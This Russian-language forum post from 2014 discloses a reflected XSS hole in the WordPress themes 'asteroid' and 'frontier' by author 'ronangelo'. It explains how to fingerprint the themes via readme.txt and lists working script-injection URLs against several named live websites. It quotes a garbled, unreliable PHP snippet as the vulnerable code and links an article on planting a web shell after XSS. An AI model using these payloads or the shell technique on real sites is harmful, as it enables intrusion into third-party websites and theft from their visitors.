Показать сообщение отдельно

  #8  
Старый 07.10.2014, 02:16
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Уязвимость в шаблонах для WordPress от автора "ronangelo" пасивная XSS

его темы можно идентифецировать по файлу readme.txt в корне темы:

Цитата:
Сообщение от None  
http://localhost/wp-content/themes/asteroid/readme.txt
Примеры уязвимых сайтов:

Цитата:
Сообщение от None  
_ttps://wp-themes.com/wp-content/themes/asteroid/includes/content-width.php?content_width=%3Cscript%3Ealert%28%22123 %22%29;%3C/script%3E
_ttp://rwandanationalparks.com/wp-content/themes/asteroid/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
_ttp://www.serpsherpa.com/wp-content/themes/frontier/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
_ttp://ramkrista.com/wp-content/themes/frontier/includes/content-width.php?content_width=%3Cscript%3Ealert%28123%29 ;%3C/script%3E
сам уязвимый код:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/
COLOR].mceContentBody {width: [COLOR="#0000BB"][/COLOR]px;}[/COLOR
статья, как лить шелл в WP при XSS:

Цитата:
Сообщение от None  
_ttp://habrahabr.ru/company/dsec/blog/194282/
 
Ответить с цитированием